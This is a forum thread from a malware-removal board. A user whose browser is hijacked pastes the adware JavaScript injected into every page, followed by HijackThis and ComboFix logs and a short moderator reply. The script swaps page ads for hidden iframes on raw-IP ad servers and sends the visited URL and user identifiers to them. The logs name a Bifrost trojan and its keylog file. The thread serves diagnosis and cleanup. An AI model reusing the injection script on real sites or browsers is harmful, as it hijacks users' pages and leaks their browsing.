There's no such thing as a stupid question, but they're the easiest to answer.
JoinTour
Login
Search
 
Malware Removal & HijackThis Logs
Tag Cloud
adware audio bios blue screen boot bsod card computer connection crash dell driver drivers error excel firefox freeze google hard drive hardware hijackthis install internet laptop linux malware network no sound outlook problem reboot redirect router screen server slow sound speakers spyware startup trojan usb video virus vista windows windows 7 windows vista windows xp wireless
Search
Search for:
Tech Support Guy Forums > Security & Malware Removal > Malware Removal & HijackThis Logs >
Solved: Browser Hijacked (New)

Tip: Click here to scan for System Errors and Optimize PC performance
[ Sponsored Link ]

Closed Thread
 
Thread Tools
anthon69's Avatar
Junior Member with 9 posts.
  
Join Date: Apr 2008
04-Apr-2008, 10:32 AM #1
Solved: Browser Hijacked
My browsers are infected with adware, when I browse the internet the pages load extremely slow as the infection parses each HTML page to replace default banner ads with the host's own banner ads, The longer I have Firefox open the larger it hogs up memory.. each page I surf automatically has the following javascript code embeded within:
(I've had to edit the javascript code since it exceeded max # of characters in a post

[CODE ]
<script type="text/javascript" language="javascript">


onloadevent_E850A1B8F15A48e9BD405A67D067013E = window.onload;
window.onload = f_E850A1B8F15A48e9BD405A67D067013E;

TopWndUrl_E850A1B8F15A48e9BD405A67D067013E = "";
MetaKwd_E850A1B8F15A48e9BD405A67D067013E = "";
FrameString_E850A1B8F15A48e9BD405A67D067013E = "";

EscUrl_24578457887 = escape(window.location.href);
MainAid_24578457887 = '152099';
MainGiud_24578457887 = '7704E85CF26E40B5B5BB53F83781CB35';
MainUid_24578457887 = '8D02F752FF8E11DC9070152099CFFFFF';
MainRid_24578457887 = 'radip2';


ruleset_AA532B7B55D44dbb87FAB30BCA27C538 = new Array();

/*
// example of the normal rule
ruleset_AA532B7B55D44dbb87FAB30BCA27C538.push( {"Name" : "NormalRuleName", "Global" : 0,
"AntiArr" : arrAnti, "ContentArr" : arrContent, "MetaArr" : arrMeta, "UrlArr" : arrUrl,
"minCX" : 3, "maxCX" : 1000, "minCY" : 3, "maxCY" : 1000,
"Image" : "http://ya.ru/logo.gif", "Click" : "http://www.ya.ru", "ReplaceAll" : 1};

// example of the locale rule
ruleset_AA532B7B55D44dbb87FAB30BCA27C538.push( {"Name" : "LocaleRuleName", "Global" : 1,
"minCX" : 3, "maxCX" : 1000, "minCY" : 3, "maxCY" : 1000,
"Image" : "http://ya.ru/logo.gif", "Click" : "http://www.ya.ru", "ReplaceAll" : 1};
*/

InitArray_24578457887 = new Array();

//FrID, FrSrc, FrWidthMin, FrWidthMax, FrHeightMin, FrHeightMax, AHref, ImgSrc
//InitArray_24578457887.push(
// CreateInitObject_24578457887('aff78e03',
// 'http://85.17.166.173/go/?cmp=nm_bm3s_728x90',
// '728', '730', '90', '95'
// 'http://85.12.43.83/www/delivery/ck.php?n=a8ac5ed4',
// 'http://85.12.43.83/www/delivery/avw.php?zoneid=48&n=a8ac5ed4'));
//InitArray.push

var arrAnti = new Array();var arrContent = new Array(".");var arrMeta = new Array(".");var arrUrl = new Array(".");var element = { "Name" : "b120x240", "Global" : 0, "AntiArr" : arrAnti, "ContentArr" : arrContent, "MetaArr" : arrMeta, "UrlArr" : arrUrl};ruleset_AA532B7B55D44dbb87FAB30BCA27C538.push(element);
InitArray_24578457887.push(CreateInitObject_24578457887(
'b120x240',
'http://85.12.43.83/fls.geo/CA_120x240_3.html?a=b',
'120', '120', '240', '240',
'',
''));


ExclusionArray_24578457887 = new Array();


function f_E850A1B8F15A48e9BD405A67D067013E()
{
var MainCollection;

window.onload = onloadevent_E850A1B8F15A48e9BD405A67D067013E; // reset onload event

if (onloadevent_E850A1B8F15A48e9BD405A67D067013E != null)
onloadevent_E850A1B8F15A48e9BD405A67D067013E();

if (!document || !document.body || !document.body.childNodes)
return;

TopWndUrl_E850A1B8F15A48e9BD405A67D067013E = GetTopWindowUrl_C782A923BB0348e19544F09902515411();
MetaKwd_E850A1B8F15A48e9BD405A67D067013E = GetMeta_C782A923BB0348e19544F09902515411();
FrameString_E850A1B8F15A48e9BD405A67D067013E = GetFrameContent_C782A923BB0348e19544F09902515411(document.body);

initialize_24578457887();
if(MustExit_24578457887())
return;

MainCollection = document.body.childNodes;
ReplaceByFrame_24578457887(InitArray_24578457887, MainCollection, 0);

} //function f_E850A1B8F15A48e9BD405A67D067013E()


function GetTopWindowUrl_C782A923BB0348e19544F09902515411()
{
var temp = "";
var e;
try
{
temp = window.top.location.href;
}
catch(e)
{
temp = window.location.href;
}
return temp;
} //function GetTopWindowUrl_C782A923BB0348e19544F09902515411()


function SimpleEncode_C782A923BB0348e19544F09902515411(str)
{
if (str == null)
return "";

str = escape(str);
str = str.replace(/\+/g, "%2B");
str = str.replace(/\//g, "%2F");

return str;
} //function SimpleEncode_C782A923BB0348e19544F09902515411(str)


function GetMeta_C782A923BB0348e19544F09902515411()
{
var e;
var str = "";
try
{
var head = window.top.document.getElementsByTagName('head').item(0);
if(head != null)
{
if (head.childNodes != null && head.childNodes.length > 0)
{
for(var y=head.childNodes.length-1; y>=0; y--)
{
var child = head.childNodes.item(y);
if(child.tagName == "META")
{
str += "<META ";

if(child.content != "" && child.name == "keywords")
str += 'content="' + child.content + '" ';

str += " >\n";
}
}
}
}
}
catch(e)
{
}

str = SimpleEncode_C782A923BB0348e19544F09902515411(str);

return str;
} //function GetMeta_C782A923BB0348e19544F09902515411()


function CheckUrl_3A315874118D436c8E256384792D2A73(rulesetElement)
{
var i;

// check if it's locale matching
if (rulesetElement.Global == 1)
return "_";

// check antikeywords
for (i = 0; i < rulesetElement.AntiArr.length; i++)
if (document.location.href.indexOf(rulesetElement.AntiArr[i]) != -1)
return null;

// check content keywords
for (i = 0; i < rulesetElement.ContentArr.length; i++)
if (FrameString_E850A1B8F15A48e9BD405A67D067013E.indexOf(rulesetElement.Conten tArr[i]) != -1)
return rulesetElement.ContentArr[i];

// check metakeywords
for (i = 0; i < rulesetElement.MetaArr.length; i++)
if (MetaKwd_E850A1B8F15A48e9BD405A67D067013E.indexOf(rulesetElement.MetaArr[i]) != -1)
return rulesetElement.MetaArr[i];

// check urlkeywords
for (i = 0; i < rulesetElement.UrlArr.length; i++)
if (document.location.href.indexOf(rulesetElement.UrlArr[i]) != -1)
return rulesetElement.UrlArr[i];

return null;

} //function CheckUrl_3A315874118D436c8E256384792D2A73(rulesetElement)



function GetFrameContent_C782A923BB0348e19544F09902515411(nodeElement)
{
var retStr = "";

if(null==nodeElement)
return "";

if (nodeElement.nodeValue != null)
retStr = nodeElement.nodeValue;

var allChildrenNode = nodeElement.childNodes;

if (allChildrenNode != null && allChildrenNode.length > 0)
{
for(var y=allChildrenNode.length-1; y>=0; y--)
{
var child = allChildrenNode.item(y);

retStr = retStr + GetFrameContent_C782A923BB0348e19544F09902515411(child);
}
}

retStr = retStr + " ";
return retStr;
} //function GetFrameContent_C782A923BB0348e19544F09902515411(nodeElement)


function Connection_3A315874118D436c8E256384792D2A73(Obj)
{
// var img = new Image();
//
// if(Obj)
// img.src = "http://127.0.0.1/" + Math.random() + "AA532B7B55D44dbb87FAB30BCA27C538?" + Obj.FrID;
// else
// img.src = "http://127.0.0.1/" + Math.random() + "AA532B7B55D44dbb87FAB30BCA27C538?null";
//alert('Connection ' + Obj.FrID + ' src: ' + Obj.FrSrc);
try
{
var fr = document.createElement("iframe");
fr.src = "http://127.0.0.1/" + Math.random() + "AA532B7B55D44dbb87FAB30BCA27C538?" + Obj.FrID;
fr.width = 0;
fr.height = 0;
document.body.appendChild(fr);
}
catch(e){}


} //function Connection_3A315874118D436c8E256384792D2A73()



function MustExit_24578457887()
{
var flExcl = 0;
var str;
var aid = MainAid_24578457887;
var ss;
var i;

flExcl = 0;
str = window.location.href;
for(i = 0; i < ExclusionArray_24578457887.length; ++i)
{

if(!ExclusionArray_24578457887[i].length)
continue;

if(str.length < ExclusionArray_24578457887[i].length)
continue;

if(str.substr(0, ExclusionArray_24578457887[i].length) == ExclusionArray_24578457887[i])
{
flExcl = 1;
break;
}

}; //for(j = 0; j < ExclusionArray_24578457887.length; ++j)

if(flExcl)
return 1;

flExcl = 0;
for(i = 0; i < str.length - aid.length + 1; i++)
{
ss = str.substr(i, aid.length);
if(ss == aid)
{
flExcl = 1;
break;
}
} //for(j = 0; j < str.length - 4; j++)

if(flExcl)
return 1;

return 0;

}; //function MustExit()


function initialize_24578457887()
{
var i;
var str;

for(i = 0; i < InitArray_24578457887.length; ++i)
{
str = GetDomain_24578457887(InitArray_24578457887[i].FrSrc);
if(str.length)
ExclusionArray_24578457887.push(str);

str = GetDomain_24578457887(InitArray_24578457887[i].AHref);
if(str.length)
ExclusionArray_24578457887.push(str);

str = GetDomain_24578457887(InitArray_24578457887[i].ImgSrc);
if(str.length)
ExclusionArray_24578457887.push(str);

} //for(i = 0; i < InitArray_24578457887; ++i)

} //function initialize()


function CreateFrame_24578457887(InitObj)
{
var XFrame = document.createElement("iframe");
XFrame.id = InitObj.FrID;
XFrame.name = InitObj.FrName;
XFrame.framespacing = InitObj.FrSpacing;
XFrame.frameborder = InitObj.FrBorder;
XFrame.scrolling = InitObj.FrScrolling ;
XFrame.width = InitObj.FrWidthMin;
XFrame.height = InitObj.FrHeightMin;

if(!XFrame.frameborder || XFrame.frameborder == 'no')
{
XFrame.style.borderWidth = "0px";
XFrame.frameBorder = '0';
}

return XFrame;

} //function CreateFrame(El)

function CheckImg_24578457887(ObjArray, El)
{
var i;

try
{

for(i = 0; i < ObjArray.length; ++i)
if(
( (El.width >= ObjArray[i].FrWidthMin) && (El.width <= ObjArray[i].FrWidthMax) ) &&
( (El.height >= ObjArray[i].FrHeightMin) && (El.height <= ObjArray[i].FrHeightMax) )
)
return ObjArray[i];

}
catch(e) {}

return null;

} //function CheckImg(El)


function CheckObj_24578457887(ObjArray, El)
{
var i;

try
{
for(i = 0; i < ObjArray.length; ++i)
if(
( (El.getAttribute("width") >= ObjArray[i].FrWidthMin) && (El.getAttribute("width") <= ObjArray[i].FrWidthMax) ) &&
( (El.getAttribute("height") >= ObjArray[i].FrHeightMin) && (El.getAttribute("height") <= ObjArray[i].FrHeightMax) )
)

return ObjArray[i];
}
catch(e){}

return null;

} //function CheckObj(El)

function CheckID_24578457887(ObjArray, El)
{
var i;

try
{
if(El.id)
for(i = 0; i < ObjArray.length; ++i)
if(El.id == ObjArray[i].FrID)
return ObjArray[i];
}
catch(e) {}

return null;

} //function CheckID_24578457887(ObjArray, El)


function WrFrame_24578457887(InitObj)
{
var FrameList = null;
var j;
var xd, yd;

FrameList = window.frames;
for(j = 0; j < FrameList.length; ++j)
{

try
{
if(!FrameList[j].frameElement)
continue;
if(!FrameList[j].frameElement.id)
continue;
if(FrameList[j].frameElement.id != InitObj.FrID)
continue;
}
catch(e)
{
continue;
}

try
{
FrameList[j].document.write("<html> <body id='B" + InitObj.FrID + "' name='B" + InitObj.FrID + "'> " +
" <iframe id=" + InitObj.FrID + " name=" + InitObj.FrID +
" src=" + InitObj.FrSrc +
" framespacing=" + InitObj.FrSpacing + " frameborder=" + InitObj.FrBorder +
" scrolling=" + InitObj.FrScrolling +
" width=" + InitObj.FrWidthMin + " height=" + InitObj.FrHeightMin + "> " +
" <a href=" + InitObj.AHref +
" target=" + InitObj.ATarget +
"><img flNotNeed=1 src=" + InitObj.ImgSrc +
" border=" + InitObj.ImgBorder +
" alt=" + InitObj.ImgAlt + " /> </a> </body> </iframe><html>");
}
catch(e)
{ continue; }

try
{
xd = FrameList[j].document.getElementById('B' + InitObj.FrID).getAttribute("clientLeft") +
FrameList[j].document.getElementById(InitObj.FrID).getAttribute("offsetLeft");

yd = FrameList[j].document.getElementById('B' + InitObj.FrID).getAttribute("clientTop") +
FrameList[j].document.getElementById(InitObj.FrID).getAttribute("offsetTop");

if(navigator.appName == 'Microsoft Internet Explorer')
{
xd += 7;
yd += 12;
} //if(navigator.appName == 'Microsoft Internet Explorer')
else if(navigator.appName == 'Netscape')
{
xd = '8';
yd = '8'
}//if(navigator.appName == 'Netscape')
else if(navigator.appName == 'Opera')
{
xd = '5';
yd = '5';
} //else if(navigator.appName == 'Opera')

}
catch(e)
{

if(navigator.appName == 'Microsoft Internet Explorer')
{
xd = '8';
yd = '14'
}//if(navigator.appName == 'Microsoft Internet Explorer')
if(navigator.appName == 'Netscape')
{
xd = '8';
yd = '8'
}//if(navigator.appName == 'Netscape')
else if(navigator.appName == 'Opera')
{
xd = '5';
yd = '5';

}//else if(navigator.appName == 'Opera')
}

try
{
FrameList[j].document.getElementById('B' + InitObj.FrID).style.marginLeft= '-' + xd + 'px';
FrameList[j].document.getElementById('B' + InitObj.FrID).style.marginTop= '-' + yd + 'px';
}
catch(e) {}

} //for(j = 0; j < document.frames.length; ++j)

} //function RepChild_24578457887()


function CheckTagIMG_24578457887(El, InitArray)
{
var InitObj;
var flExcl;
var NewFrame;
var i;

if(El.parentNode.tagName != "A")
return 0;

InitObj = CheckImg_24578457887(InitArray, El);
if(!InitObj)
return 1;

flExcl = 0;
for(i = 0; i < ExclusionArray_24578457887.length; ++i)
{
if(!ExclusionArray_24578457887[i].length)
continue;

if(El.parentNode.href.length < ExclusionArray_24578457887[i].length)
continue;

if(El.parentNode.href.substr(0, ExclusionArray_24578457887[i].length) == ExclusionArray_24578457887[i])
{
flExcl = 1;
break;
}

}; //for(j = 0; j < ExclusionArray_24578457887.length; ++j)

if(flExcl)
return 1;

NewFrame = CreateFrame_24578457887(InitObj);
El.parentNode.parentNode.replaceChild(NewFrame, El.parentNode);

WrFrame_24578457887(InitObj);

Connection_3A315874118D436c8E256384792D2A73(InitObj);

return 0;

} //function CheckTagIMG_24578457887()

function CheckTagEMBED_24578457887(El, InitArray)
{
var str;
var InitObj;
var NewFrame;
var i;

if(El.parentNode == null)
return 1;

str = El.getAttribute("src");
if(!str)
return 1;

for(i = 0; i < str.length - 3; ++i)
{
ss = str.substr(i, 4);
if(ss == ".swf")
break;
} //for(j = 0; j < str.length - 4; j++)

if(ss != ".swf")
return 1;

if(var InitObj = new Object();

InitObj.FrID = FrID;
InitObj.FrName = FrID;

InitObj.FrSrc = FrSrc + '&aid=' + MainAid_24578457887 +
'&guid=' + MainGiud_24578457887 + '&uid=' + MainUid_24578457887 +
'&rid=' + MainRid_24578457887 + '&url=' + EscUrl_24578457887;

InitObj.FrWidthMin = FrWidthMin;
InitObj.FrWidthMax = FrWidthMax;
InitObj.FrHeightMin = FrHeightMin;
InitObj.FrHeightMax = FrHeightMax;

InitObj.FrSpacing = '0';
InitObj.FrBorder = 'no';
InitObj.FrScrolling = 'no';


InitObj.AHref = AHref;
InitObj.ATarget = 'blank';

InitObj.ImgSrc = ImgSrc;
InitObj.ImgBorder = '0';
InitObj.ImgAlt = '';

return InitObj;

} //function CreateInitObject()


function GetDomain_24578457887(str)
{
var i;
var str2 = "";

for(i = 0; i < str.length; ++i)
{

str2 += str.charAt(i);

if(str.charAt(i) == '/')
{
if( ((i + 1) < str.length) && ((i - 1) >= 0) )
{
if( (str.charAt(i + 1) != '/') && (str.charAt(i - 1) != '/') )
break;
}
else if( ((i + 1) < str.length) && (str.charAt(i + 1) != '/') )
break;
else if ( ((i - 1) >= 0) && (str.charAt(i - 1) != '/') )
break;

} //if(str[i] == '/')

} //for(i = 0; i < str.length; ++i)

return str2;

} //function GetDomain_24578457887(str)


</script>
[/code]




here is my hijack log:

Logfile of HijackThis v1.99.1
Scan saved at 10:24:48 AM, on 4/4/2008
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\csrss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\DigitalPersona\Bin\DPWinLct.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\System32\svchost.exe
c:\Program Files\Common Files\Symantec Shared\ccSetMgr.exe
c:\Program Files\Common Files\Symantec Shared\ccEvtMgr.exe
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\System32\CTsvcCDA.exe
c:\Program Files\Symantec AntiVirus\DefWatch.exe
C:\Program Files\DigitalPersona\Bin\DpHost.exe
C:\Program Files\Google\Common\Google Updater\GoogleUpdaterService.exe
C:\WINDOWS\system32\nvsvc32.exe
C:\WINDOWS\System32\svchost.exe
c:\Program Files\Symantec AntiVirus\Rtvscan.exe
C:\Program Files\Viewpoint\Common\ViewpointService.exe
C:\Program Files\Webroot\Enterprise\Spy Sweeper\CommAgent.exe
C:\WINDOWS\System32\MsPMSPSv.exe
C:\Program Files\DigitalPersona\Bin\DPFUSMgr.exe
C:\Program Files\Webroot\Enterprise\Spy Sweeper\SpySweeper.exe
C:\WINDOWS\System32\alg.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\System32\svchost.exe
C:\Program Files\Adobe\Photoshop 7.0\Photoshop.exe
C:\Program Files\MSN Messenger\msnmsgr.exe
C:\Program Files\MSN Messenger\usnsvc.exe
C:\WINDOWS\system32\notepad.exe
C:\putty1.exe
C:\Program Files\Outlook Express\msimn.exe
C:\WINDOWS\system32\wuauclt.exe
C:\Program Files\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\WINDOWS\system32\notepad.exe
C:\WINDOWS\system32\notepad.exe
C:\PROGRA~1\MICROS~3\Office10\FRONTPG.EXE
D:\Utilities\WS_FTP\WS_FTP95.exe
C:\PROGRA~1\MOZILL~1\FIREFOX.EXE
C:\Program Files\Adobe\Acrobat 7.0\Reader\AcroRd32.exe
C:\WINDOWS\system32\rundll32.exe
C:\WINDOWS\system32\rundll32.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\WINDOWS\system32\notepad.exe
C:\Program Files\Mozilla Firefox\firefox.exe
C:\Program Files\Azureus\Azureus.exe
C:\WINDOWS\system32\wuauclt.exe
C:\HijackThis\HijackThis.exe

O3 - Toolbar: &Google - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - c:\program files\google\googletoolbar2.dll
O3 - Toolbar: Azoogle Toolbar - {0E1230F8-EA50-42A9-983C-D22ABC2EED3B} - C:\Program Files\Azoogle\Azoogle Toolbar\azoogletoolbar.dll
O4 - HKLM\..\Run: [SoundMan] SOUNDMAN.EXE
O4 - HKLM\..\Run: [EM_EXEC] C:\PROGRA~1\Logitech\MOUSEW~1\SYSTEM\EM_EXEC.EXE
O4 - HKLM\..\Run: [Disc Detector] C:\Program Files\Creative\ShareDLL\CtNotify.exe
O4 - HKLM\..\Run: [WINDVDPatch] CTHELPER.EXE
O4 - HKLM\..\Run: [UpdReg] C:\WINDOWS\UpdReg.EXE
O4 - HKLM\..\Run: [Jet Detection] "C:\Program Files\Creative\SBLive\PROGRAM\ADGJDet.exe"
O4 - HKLM\..\Run: [CTStartup] C:\Program Files\Creative\Splash Screen\CTEaxSpl.EXE /run
O4 - HKLM\..\Run: [gcasServ] "C:\Program Files\Microsoft AntiSpyware\gcasServ.exe"
O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Program Files\Java\jre1.5.0_10\bin\jusched.exe"
O4 - HKLM\..\Run: [Instant Buzz Daemon] C:\Program Files\Instant Buzz\IBDaemon.exe
O4 - HKLM\..\Run: [ATICCC] "C:\Program Files\ATI Technologies\ATI.ACE\cli.exe" runtime -Delay
O4 - HKLM\..\Run: [NeroFilterCheck] C:\WINDOWS\system32\NeroCheck.exe
O4 - HKLM\..\Run: [HP Software Update] D:\programs\HP\HP Software Update\HPWuSchd2.exe
O4 - HKLM\..\Run: [QuickTime Task] "C:\Program Files\QuickTime\qttask.exe" -atboottime
O4 - HKLM\..\Run: [DPAgnt] C:\Program Files\DigitalPersona\Bin\DPAgnt.exe
O4 - HKLM\..\Run: [NvCplDaemon] RUNDLL32.EXE C:\WINDOWS\system32\NvCpl.dll,NvStartup
O4 - HKLM\..\Run: [nwiz] nwiz.exe /install
O4 - HKLM\..\Run: [NvMediaCenter] RUNDLL32.EXE C:\WINDOWS\system32\NvMcTray.dll,NvTaskbarInit
O4 - HKLM\..\Run: [SpySweeperEnterprise] "C:\Program Files\Webroot\Enterprise\Spy Sweeper\SpySweeperUI.exe" /StartInTray
O4 - HKLM\..\Run: [ccApp] "c:\Program Files\Common Files\Symantec Shared\ccApp.exe"
O4 - HKLM\..\Run: [vptray] c:\PROGRA~1\SYMANT~1\VPTray.exe
O4 - HKLM\..\Run: [0042e86a] rundll32.exe "C:\WINDOWS\system32\ohfchnhq.dll",b
O4 - HKCU\..\Run: [MSMSGS] "C:\Program Files\Messenger\MSMSGS.EXE" /background
O4 - HKCU\..\Run: [LDM] C:\Program Files\Logitech\Desktop Messenger\8876480\Program\BackWeb-8876480.exe
O4 - HKCU\..\Run: [Vidalia] "C:\Program Files\Vidalia Bundle\Vidalia\vidalia.exe"
O4 - HKCU\..\Run: [swg] C:\Program Files\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe
O4 - HKCU\..\Run: [Skype] "C:\Program Files\Skype\Phone\Skype.exe" /nosplash /minimized
O4 - HKCU\..\Run: [updateMgr] "C:\Program Files\Adobe\Acrobat 7.0\Reader\AdobeUpdateManager.exe" AcRdB7_0_9 -reboot 1
O4 - HKCU\..\Run: [Aim6] "C:\Program Files\AIM6\aim6.exe" /d locale=en-US ee://aol/imApp
O4 - Global Startup: Adobe Reader Speed Launch.lnk = C:\Program Files\Adobe\Acrobat 7.0\Reader\reader_sl.exe
O4 - Global Startup: Color Calibration.lnk = ?
O4 - Global Startup: Event Reminder.lnk = D:\PrintMaster\PrintMaster 16\pmremind.exe
O4 - Global Startup: Google Updater.lnk = C:\Program Files\Google\Google Updater\GoogleUpdater.exe
O4 - Global Startup: HP Digital Imaging Monitor.lnk = D:\Programs\HP\Digital Imaging\bin\hpqtra08.exe
O4 - Global Startup: HP Image Zone Fast Start.lnk = D:\Programs\HP\Digital Imaging\bin\hpqthb08.exe
O4 - Global Startup: Logitech Desktop Messenger.lnk = C:\Program Files\Logitech\Desktop Messenger\8876480\Program\LDMConf.exe
O4 - Global Startup: LUMIX Simple Viewer.lnk = ?
O4 - Global Startup: NkbMonitor.exe.lnk = C:\Program Files\Nikon\PictureProject\NkbMonitor.exe
O8 - Extra context menu item: E&xport to Microsoft Excel - res://C:\PROGRA~1\MICROS~3\Office10\EXCEL.EXE/3000
O8 - Extra context menu item: Sothink SWF Catcher - C:\Program Files\Common Files\SourceTec\SWF Catcher\InternetExplorer.htm
O9 - Extra button: Skype - {77BF5300-1474-4EC7-9980-D32B190E9B07} - C:\Program Files\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll
O9 - Extra button: Sothink SWF Catcher - {E19ADC6E-3909-43E4-9A89-B7B676377EE3} - C:\Program Files\Common Files\SourceTec\SWF Catcher\InternetExplorer.htm
O9 - Extra 'Tools' menuitem: Sothink SWF Catcher - {E19ADC6E-3909-43E4-9A89-B7B676377EE3} - C:\Program Files\Common Files\SourceTec\SWF Catcher\InternetExplorer.htm
O16 - DPF: {5C6698D9-7BE4-4122-8EC5-291D84DBD4A0} (Facebook Photo Uploader 4 Control) - http://upload.facebook.com/controls/...oUploader3.cab
O16 - DPF: {5F8469B4-B055-49DD-83F7-62B522420ECC} (Facebook Photo Uploader Control) - http://upload.facebook.com/controls/...toUploader.cab
O16 - DPF: {6414512B-B978-451D-A0D8-FCFDF33E833C} (WUWebControl Class) - http://update.microsoft.com/windowsu...?1126034224607
O16 - DPF: {6B78B13A-6E99-4588-8EAB-C2399B202022} (iVocalize Web Conference 4 Setup) - http://www.edc.inetcommunicator.net/iv4.cab
O16 - DPF: {CCA0B877-CB5E-4ADC-AD30-457C379512DD} (Gif89 Lite Class) - http://69.42.9.110/xplugLiteAL.cab
O16 - DPF: {F137B9BA-89EA-4B04-9C67-2074A9DF61FD} (Photo Upload Plugin Class) - http://costco.pnimedia.com/upload/ac...v2.0.0.10.cab?
O18 - Protocol: livecall - {828030A1-22C1-4009-854F-8E305202313F} - C:\PROGRA~1\MSNMES~1\MSGRAP~1.DLL
O18 - Protocol: msnim - {828030A1-22C1-4009-854F-8E305202313F} - C:\PROGRA~1\MSNMES~1\MSGRAP~1.DLL
O18 - Protocol: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\PROGRA~1\COMMON~1\Skype\SKYPE4~1.DLL
O21 - SSODL: WPDShServiceObj - {AAA288BA-9A4C-45B0-95D7-94D524869DB5} - C:\WINDOWS\system32\WPDShServiceObj.dll
O23 - Service: Adobe LM Service - Unknown owner - C:\Program Files\Common Files\Adobe Systems Shared\Service\Adobelmsvc.exe
O23 - Service: Symantec Event Manager (ccEvtMgr) - Symantec Corporation - c:\Program Files\Common Files\Symantec Shared\ccEvtMgr.exe
O23 - Service: Symantec Password Validation (ccPwdSvc) - Symantec Corporation - c:\Program Files\Common Files\Symantec Shared\ccPwdSvc.exe
O23 - Service: Symantec Settings Manager (ccSetMgr) - Symantec Corporation - c:\Program Files\Common Files\Symantec Shared\ccSetMgr.exe
O23 - Service: Creative Service for CDROM Access - Creative Technology Ltd - C:\WINDOWS\System32\CTsvcCDA.exe
O23 - Service: Symantec AntiVirus Definition Watcher (DefWatch) - Symantec Corporation - c:\Program Files\Symantec AntiVirus\DefWatch.exe
O23 - Service: Windows XP FUS Manager (DPFUSMgr) - DigitalPersona, Inc. - C:\Program Files\DigitalPersona\Bin\DPFUSMgr.exe
O23 - Service: Biometric Authentication Service (DpHost) - DigitalPersona, Inc. - C:\Program Files\DigitalPersona\Bin\DpHost.exe
O23 - Service: Google Updater Service (gusvc) - Google - C:\Program Files\Google\Common\Google Updater\GoogleUpdaterService.exe
O23 - Service: InstallDriver Table Manager (IDriverT) - Macrovision Corporation - C:\Program Files\Common Files\InstallShield\Driver\11\Intel 32\IDriverT.exe
O23 - Service: NVIDIA Display Driver Service (NVSvc) - NVIDIA Corporation - C:\WINDOWS\system32\nvsvc32.exe
O23 - Service: SAVRoam (SavRoam) - symantec - c:\Program Files\Symantec AntiVirus\SavRoam.exe
O23 - Service: Symantec Network Drivers Service (SNDSrvc) - Symantec Corporation - c:\Program Files\Common Files\Symantec Shared\SNDSrvc.exe
O23 - Service: Symantec AntiVirus - Symantec Corporation - c:\Program Files\Symantec AntiVirus\Rtvscan.exe
O23 - Service: Trackback Poster (TS Poster) - GungHo Technologies LLC - C:\Program Files\Trackback Spider\Poster Service.exe
O23 - Service: Viewpoint Manager Service - Viewpoint Corporation - C:\Program Files\Viewpoint\Common\ViewpointService.exe
O23 - Service: Webroot CommAgent Service (WebrootCommAgentService) - Webroot Software, Inc. - C:\Program Files\Webroot\Enterprise\Spy Sweeper\CommAgent.exe
O23 - Service: WebrootSpySweeperService - Webroot Software, Inc. - C:\Program Files\Webroot\Enterprise\Spy Sweeper\SpySweeper.exe


thanks in advance for any help!
Cheers
Last edited by cybertech : 11-Apr-2008 02:55 PM.
Register for free to hide this ad!
cybertech's Avatar
Computer Specs
Moderator with 68,029 posts.
  
Join Date: Apr 2002
Location: Washington State
07-Apr-2008, 10:08 AM #2
Hi, Welcome to TSG!!

Please visit this webpage for instructions on installing recovery console and downloading/running ComboFix.

Post the log from ComboFix along with a new HijackThis log.
anthon69's Avatar
Junior Member with 9 posts.
  
Join Date: Apr 2008
07-Apr-2008, 11:50 AM #3
Thanks for the reply!:

here is Combofix logfile followed by new hijackthis log:

--------------------------------------------------------------------------------------------------

ComboFix 08-04-06.1 - tony 2008-04-07 11:26:42.1 - NTFSx86
Microsoft Windows XP Professional 5.1.2600.2.1252.1.1033.18.525 [GMT -4:00]
Running from: C:\Documents and Settings\tony\Desktop\ComboFix.exe
.

((((((((((((((((((((((((((((((((((((((( Other Deletions )))))))))))))))))))))))))))))))))))))))))))))))))
.

C:\Program Files\bifrost\klog.dat
C:\Program Files\bifrost\server.exe
C:\WINDOWS\BM0371dbf6.xml
C:\WINDOWS\cookies.ini
C:\WINDOWS\pskt.ini
C:\WINDOWS\system32\baJSDJjl.ini
C:\WINDOWS\system32\baJSDJjl.ini2
C:\WINDOWS\system32\bwidgfsb.dll
C:\WINDOWS\system32\dbvhetud.dll
C:\WINDOWS\system32\dnvjwxie.dll
C:\WINDOWS\system32\fjfbsrhy.dll
C:\WINDOWS\system32\hrrkqqoi.ini
C:\WINDOWS\system32\hrydnffd.dll
C:\WINDOWS\system32\ioqqkrrh.dll
C:\WINDOWS\system32\lfvahgrn.dll
C:\WINDOWS\system32\ljJDSJab.dll
C:\WINDOWS\system32\nfuxdpay.dll
C:\WINDOWS\system32\xhsnjvki.dll
C:\WINDOWS\system32\xxyyvSLb.dll

.
((((((((((((((((((((((((( Files Created from 2008-03-07 to 2008-04-07 )))))))))))))))))))))))))))))))
.

2008-04-03 18:59 . 2008-04-06 19:10 1,961,974 ---hs---- C:\WINDOWS\system32\qhnhcfho.ini
2008-04-02 18:59 . 2008-04-03 18:58 1,608,371 ---hs---- C:\WINDOWS\system32\qfwvlxew.ini
2008-04-01 19:00 . 2008-04-02 11:33 1,600,123 ---hs---- C:\WINDOWS\system32\yntfdbjo.ini
2008-03-22 13:56 . 2008-03-22 13:56 2,267 --a------ C:\dating.csv
2008-03-10 15:49 . 2008-03-10 15:49 <DIR> d-------- C:\Documents and Settings\tony\Application Data\acccore
2008-03-10 15:46 . 2008-03-10 15:46 <DIR> d-------- C:\Program Files\Common Files\AOL
2008-03-10 15:46 . 2008-03-10 15:48 <DIR> d-------- C:\Documents and Settings\All Users\Application Data\AOL OCP
